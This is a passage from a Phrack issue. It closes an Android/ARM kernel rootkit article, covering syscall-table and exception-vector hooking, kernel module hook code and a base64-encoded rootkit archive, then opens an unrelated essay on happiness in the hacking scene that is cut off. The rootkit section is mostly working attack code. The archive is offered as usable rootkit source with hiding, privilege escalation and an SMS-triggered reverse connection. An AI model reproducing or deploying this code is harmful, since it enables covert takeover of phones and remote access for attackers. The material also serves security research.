write_kmem((char *)&addr_ptr,modify_addr1,4); return; } This code gets the address of the code that handles sys_call_table within vector_swi handler routine, and then finds nop code around and stores the address of hacked_sys_call_table which is a copy version of sys_call_table. After this, we get the sys_call_table handle code from the offset in which hacked_sys_call_table resides and then hooking starts. --[ 5 - exception vector table modifying hooking techniques This section discusses two hooking techniques, one is the hooking technique which changes the address of software interrupt exception handler routine within exception vector table and the other is the technique which changes the offset of code branching to vector_swi handler. The purpose of these two techniques is to implement the hooking technique that modifies only exception vector table without changing sys_call_table and vector_swi handler. --[ 5.1 - exception vector table Exception vector table contains the address of various exception handler routines, branch code array and processing codes to call the exception handler routine. These are declared in entry-armv.S, copied to the point of the high vector(0xffff0000) by early_trap_init() routine within traps.c code, and make one exception vector table. traps.c: void __init early_trap_init(void) { unsigned long vectors = CONFIG_VECTORS_BASE; /* 0xffff0000 */ extern char __stubs_start[], __stubs_end[]; extern char __vectors_start[], __vectors_end[]; extern char __kuser_helper_start[], __kuser_helper_end[]; int kuser_sz = __kuser_helper_end - __kuser_helper_start; /* * Copy the vectors, stubs and kuser helpers (in entry-armv.S) * into the vector page, mapped at 0xffff0000, and ensure these * are visible to the instruction stream. */ memcpy((void *)vectors, __vectors_start, __vectors_end - __vectors_start); memcpy((void *)vectors + 0x200, __stubs_start, __stubs_end - __stubs_start); After the processing codes are copied in order by early_trap_init() routine, the exception vector table is initialized, then one exception vector table is made as follows. # ./coelacanth -e [000] ffff0000: ef9f0000 [Reset] ; svc 0x9f0000 branch code array [004] ffff0004: ea0000dd [Undef] ; b 0x380 [008] ffff0008: e59ff410 [SWI] ; ldr pc, [pc, #1040] ; 0x420 [00c] ffff000c: ea0000bb [Abort-perfetch] ; b 0x300 [010] ffff0010: ea00009a [Abort-data] ; b 0x280 [014] ffff0014: ea0000fa [Reserved] ; b 0x404 [018] ffff0018: ea000078 [IRQ] ; b 0x608 [01c] ffff001c: ea0000f7 [FIQ] ; b 0x400 [020] Reserved ... skip ... [22c] ffff022c: c003dbc0 [__irq_usr] ; exception handler routine addr array [230] ffff0230: c003d920 [__irq_invalid] [234] ffff0234: c003d920 [__irq_invalid] [238] ffff0238: c003d9c0 [__irq_svc] [23c] ffff023c: c003d920 [__irq_invalid] ... [420] ffff0420: c003df40 [vector_swi] When software interrupt occurs, 4 byte instruction at 0xffff0008 is executed. The code copies the present pc to the address of exception handler and then branches. In other words, it branches to the vector_swi handler routine at 0x420 of exception vector table. --[ 5.2 - Hooking techniques changing vector_swi handler The hooking technique changing the vector_swi handler is the first one that will be introduced. It changes the address of exception handler routine that processes software interrupt within exception vector table and calls the vector_swi handler routine forged by an attacker. 1. Generate the copy version of sys_call_table in kernel heap and then change the address of routine as aforementioned. 2. Copy not all vector_swi handler routine but the code before handling sys_call_table to kernel heap for simple hooking. 3. Fill the values with right values for the copied fake vector_swi handler routine to act normally and change the code to call the address of sys_call_table copy version. (generated in step 1) 4. Jump to the next position of sys_call_table handle code of original vector_swi handler routine. 5. Change the address of vector_swi handler routine of exception vector table to the address of fake vector_swi handler code. The completed fake vector_swi handler has a code like following. 00000000 : 00: e24dd048 sub sp, sp, #72 ; 0x48 04: e88d1fff stmia sp, {r0 - r12} 08: e28d803c add r8, sp, #60 ; 0x3c 0c: e9486000 stmdb r8, {sp, lr}^ 10: e14f8000 mrs r8, SPSR 14: e58de03c str lr, [sp, #60] 18: e58d8040 str r8, [sp, #64] 1c: e58d0044 str r0, [sp, #68] 20: e3a0b000 mov fp, #0 ; 0x0 24: e3180020 tst r8, #32 ; 0x20 28: 12877609 addne r7, r7, #9437184 2c: 051e7004 ldreq r7, [lr, #-4] [*]30: e59fc020 ldr ip, [pc, #32] ; 0x58 <__cr_alignment> 34: e59cc000 ldr ip, [ip] 38: ee01cf10 mcr 15, 0, ip, cr1, cr0, {0} 3c: f1080080 cpsie i 40: e1a096ad mov r9, sp, lsr #13 44: e1a09689 mov r9, r9, lsl #13 [*]48: e59f8000 ldr r8, [pc, #0] [*]4c: e59ff000 ldr pc, [pc, #0] [*]50: [*]54: [*]58: <__cr_alignment routine address referring at 0x30> The asterisk parts are the codes modified or added to the original code. In addition to the part that we modified to make the code refer __cr_alignment function, I added some instructions to save address of sys_call_table copy version to r8 register, and jump back to the original vector_swi handler function. Following is the attack code written as a kernel module. static unsigned char new_vector_swi[500]; ... void make_new_vector_swi(){ void *swi_addr=(long *)0xffff0008; void *vector_swi_ptr=0; unsigned long offset=0; unsigned long *vector_swi_addr=0,orig_vector_swi_addr=0; unsigned long add_r8_pc_addr=0; unsigned long ldr_ip_pc_addr=0; int i; offset=((*(long *)swi_addr)&0xfff)+8; vector_swi_addr=*(unsigned long *)(swi_addr+offset); vector_swi_ptr=swi_addr+offset; /* 0xffff0420 */ orig_vector_swi_addr=vector_swi_addr; /* vector_swi's addr */ /* processing __cr_alignment */ while(vector_swi_addr++){ if(((*(unsigned long *)vector_swi_addr)& 0xfffff000)==0xe28f8000){ add_r8_pc_addr=(unsigned long)vector_swi_addr; break; } /* get __cr_alingment's addr */ if(((*(unsigned long *)vector_swi_addr)& 0xfffff000)==0xe59fc000){ offset=((*(unsigned long *)vector_swi_addr)& 0xfff)+8; ldr_ip_pc_addr=*(unsigned long *) ((char *)vector_swi_addr+offset); } } /* creating fake vector_swi handler */ memcpy(new_vector_swi,(char *)orig_vector_swi_addr, (add_r8_pc_addr-orig_vector_swi_addr)); offset=(add_r8_pc_addr-orig_vector_swi_addr); for(i=0;i 0xe59ff414 */ The changed exception vector table after hooking is as follows. # ./coelacanth -e [000] ffff0000: ef9f0000 [Reset] ; svc 0x9f0000 branch code array [004] ffff0004: ea0000dd [Undef] ; b 0x380 [008] ffff0008: e59ff414 [SWI] ; ldr pc, [pc, #1044] ; 0x424 [00c] ffff000c: ea0000bb [Abort-perfetch] ; b 0x300 [010] ffff0010: ea00009a [Abort-data] ; b 0x280 [014] ffff0014: ea0000fa [Reserved] ; b 0x404 [018] ffff0018: ea000078 [IRQ] ; b 0x608 [01c] ffff001c: ea0000f7 [FIQ] ; b 0x400 [020] Reserved ... skip ... [420] ffff0420: c003df40 [vector_swi] [424] ffff0424: bf0ceb5c [new_vector_swi] ; fake vector_swi handler code Hooking starts when the address of a fake vector_swi handler code is stored at 0xffff0424 and the 4 byte branch instruction offset at 0xffff0008 changes the address around 0xffff0424 for reference. --[ 6 - Conclusion One more time, I thank many pioneers for their devotion and inspiration. I also hope various Android rootkit researches to follow. It is a pity that I couldn't cover all the ideas that occurred in my mind during writing this paper. However, I also think that it is better to discuss the advanced and practical techniques next time -if you like this one ;-)-. For more information, the attached example code provides not only file & process hiding and kernel module hiding features but also the classical rootkit features such as admin privilege succession to specific gid user and process privilege changing. I referred to the Defcon 18 whitepaper of Christian Papathanasiou and Nicholas J. Percoco for performing the reverse connection when we receive a sms message from an appointed phone number. Thanks to: vangelis and GGUM for translating Korean into English. Other than those who helped me on this paper, I'd like to thank my colleagues, people in my graduate school and everyone who knows me. --[ 7 - References [1] "Abuse of the Linux Kernel for Fun and Profit" by halflife [Phrack issue 50, article 05] [2] "Weakening the Linux Kernel" by plaguez [Phrack issue 52, article 18] [3] "RUNTIME KERNEL KMEM PATCHING" by Silvio Cesare [runtime-kernel-kmem-patching.txt] [4] "Linux on-the-fly kernel patching without LKM" by sd & devik [Phrack issue 58, article 07] [5] "Handling Interrupt Descriptor Table for fun and profit" by kad [Phrack issue 59, article 04] [6] "trojan eraser or i want my system call table clean" by riq [Phrack issue 54, article 03] [7] "yet another article about stealth modules in linux" by riq ["abtrom: anti btrom" in a mail to Bugtraq] [8] "Saint Jude, The Model" by Timothy Lawless [http://prdownloads.sourceforge.net/stjude/StJudeModel.pdf] [9] "IA32 ADVANCED FUNCTION HOOKING" by mayhem [Phrack issue 58, article 08] [10] "Android LKM Rootkit" by fred [http://upche.org/doku.php?id=wiki:rootkit] [11] "This is not the droid you're looking for..." by Trustwave [DEFCON-18-Trustwave-Spiderlabs-Android-Rootkit-WP.pdf] --[ 8 - Appendix: earthworm.tgz.uu I attach a demo code to demonstrate the concepts which I explained in this paper. This code can be used as a real code for attack or just a proof-of- concept code. I wish you use this code only for your study not for a bad purpose. <++> earthworm.tgz.uu begin-base64 644 earthworm.tgz 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 ==== <--> --[ EOF ============== Page 7/17 ============== ==Phrack Inc.== Volume 0x0e, Issue 0x44, Phile #0x07 of 0x13 |=-----------------------------------------------------------------------=| |=-------------------------=[ Happy Hacking ]=---------------------------=| |=-----------------------------------------------------------------------=| |=--------------------------=[ by Anonymous ]=---------------------------=| |=-----------------------------------------------------------------------=| ------- 1. Introduction 2. The Happiness Hypothesis 3. The consulting industry 4. Rebirth 5. Conclusions 6. References ------- --[ 1 - Introduction I've been fascinated with happiness since my college days. Prior to 1998 psychology focused on fixing people who had problems in an attempt to make them more "normal". However, recent trends in psychology have brought a whole new field called positive psychology. Positive psychology, or the science of Happiness, brings a wealth of research on how normal people can achieve greater levels of happiness. As you delve into the subject you will discover that most of the conclusions associated with the research into the topic of happiness actually runs counter to the popular culture understanding of what brings happiness. In this article I'd like to expose some ideas that directly impact the hacking scene and specifically as it relates to working in the security industry. I'd also like to introduce the idea of hacking happiness. If you could spend a percentage of your time learning about happiness, how much happier do you think you could be? Hacking happiness means cutting the path to happiness straight to what makes you happy by researching happiness just like you would any security topic. Since the article is focused on Happiness as it relates to hacking, there are many subjects of positive psychology that we are not going to touch or mention. However, if you are interested in reading more about the field, Wikipedia has an excellent article on the subject: - http://en.wikipedia.org/wiki/Positive_psychology --[ 2 - The Happiness Hypothesis Most of the ideas introduced by this article are borrowed from "The Happiness Hypothesis" by Jonathan Haidt, which I recommend if you'd like to dig deeper into the subject. The first thing about happiness that you should know that research has proved is: - "People are very bad at predicting what will bring them happiness." - To expose this idea let me provide an example. Researchers took a look at 2 different groups of people that had been through completely opposite situations, the first group are lottery winners, and the second group are people that became paraplegics through some type of accident. Both groups were interviewed at 2 different times, once just after the event (winning the lottery or becoming paraplegic), and once more again several years later. The results of their interviews are quite astonishing. The first group, the lottery winners, as you might expect, had very high happiness levels when interviewed shortly after they had won the lottery. The second group, those who were newly paralyzed had a very low level of happiness, some were even so unhappy that they regretted not dying during the accident. These findings are quite obvious and shouldn't be surprising to you; however what is astonishing are the results of the second interview. Years later, the lottery winners were interviewed again, this time the results were quite surprising. As it turns out, their happiness level had dropped significantly to levels so low that most of the winners where more unhappy now than before winning the lottery. In contrast, the happiness of the group of paraplegics was very high, equal to or higher than before the accident. So what really happened? To explain this, let me describe the circumstances of the lottery winners. Having won the lottery, they thought they had achieved everything they wanted, since popular culture equates happiness with material wealth, and so their short term happiness level grew quite high. After some time though, they started to realize that the money wasn't bringing them the happiness they once thought they would achieve when they would be rich. Frustrated at the possibility that they would never be able to achieve full happiness, their happiness level started dropping. To try to compensate for their decreasing happiness level, they started spending money on material things, but that was no longer a happiness source. Further exacerbating the problem, this new wealth brought new problems (to quote Notorious B.I.G. - "Mo money mo problems"). Now family, friends and colleagues were regarded as a threat, thinking that all they wanted is to take advantage of their new wealth. People around them started asking for loans and favors, which led them to distant themselves from their families and friends. Again, in order to compensate, they started trying to make new friends that had their own wealth status. But breaking the bonds with old friends and family that had been established for most of their lives and trying to establish new ones, brought a feeling of loneliness that directly correlates to their happiness levels significantly dropping. On the other hand those who had become paraplegics relied heavily on their families and friends to help them through the rough times, thus strengthening the bonds between them. And just like the lottery winners, the new circumstances brought back old friends from the past. But unlike with lottery winners who's friends came back looking to take advantage of their new wealth, these old friends came back for the opposite; they sought to help. Another factor associated with the increased happiness was the fact that the group that was paralyzed had to learn to cope with being paraplegics. Learning to cope with being paraplegics brought an immense sense of achievement that made their happiness levels go up. After a few years their family relations were stronger than ever; friends were closer and their sense of achievement from having overcome their limitations had brought them an immense amount of happiness that, when compared to their happiness levels before the accident, was equal and most of the times higher. If someone were to ask you whether you would choose to become paraplegic or win the lottery, it is obvious that everyone would choose to win the lottery; however this choice goes against research which has shown that by becoming a paraplegic you would ultimately be happier. Obviously I am not saying this is the path you need to choose (if you are thinking of doing this, please stop!). I am merely trying to demonstrate that the actual road to happiness may force you to look at things in a very different and counter intuitive manner. --[ 3 - The Security Industry In recent years I've seen how many hackers join the information security industry and many of them having the illusion that hacking as their day job will bring them a great deal of happiness. After a couple of years they discover they no longer enjoy hacking, that those feelings they used to have in the old days are no longer there, and they decide to blame the hacking scene, often condemning it as "being dead". I'll try to explain this behavior from the science of happiness point of view. Let me start by looking at Journalism. The science of happiness has shown that people are happy in a profession where: - "Doing good (high quality work) matches with doing well (achieving wealth and professional advancement) in the field." - Journalism is one of those careers where doing good (making the world better by promoting democracy and free press) doesn't usually lead to rising as a journalist. Julian Assange, the chief editor of Wikileaks, is a pretty obvious example of this. By firmly believing in free press he has brought upon himself a great deal of trouble. In contrast, being manipulative and exaggerating news often leads to selling more news, which in turn allows for the sales of more ads, which correlates to doing well. But by doing so, journalists have to compromise their beliefs, which ultimately makes their happiness levels go down. Those who decide not to compromise feel angry at their profession when they see those who cheat and compromise rise high. This feeling also leads to their happiness levels to drop. Journalism is therefore one of those professions where its practitioners tend to be the most unhappy. Hacking on the other hand doesn't suffer from this issue. In the hacking scene doing great work is often recognized and admired. Those hackers that are able to write that exploit thought to be impossible, or find that unbelievably complex vulnerability, are recognized and praised by the community. Also, many hackers tend to develop great tools which are often released as open source. The open source community shares a lot of properties with the hacking community. It is not hard to see why people enjoy developing open source projects so much. Most open source projects are community organizations lead by meritocracy; where the best programmers can quickly escalate the ranks by writing great code. Furthermore, the idea of making the code and the underlying designs widely available gives participants a feeling of fulfillment as they are not doing this for profit but to contribute to a better world. These ideals have also been an integral part of the hacking community where one of its mottos is, "Knowledge should be free, information should be free". Being part of such communities brings a wealth of happiness, and is the reason why these communities flourished without the need for any economic incentives. Recent years however have brought the security industry closer to the hacking industry. Many hacking scene members have become security industry members once their responsibilities demanded more money (e.g. married with kids and a mortgage). For them it seemed like the right fit and the perfect job was to hack for a living. However, the security industry does not have the same properties as the hacking or open source communities. The security industry is much more like the journalism 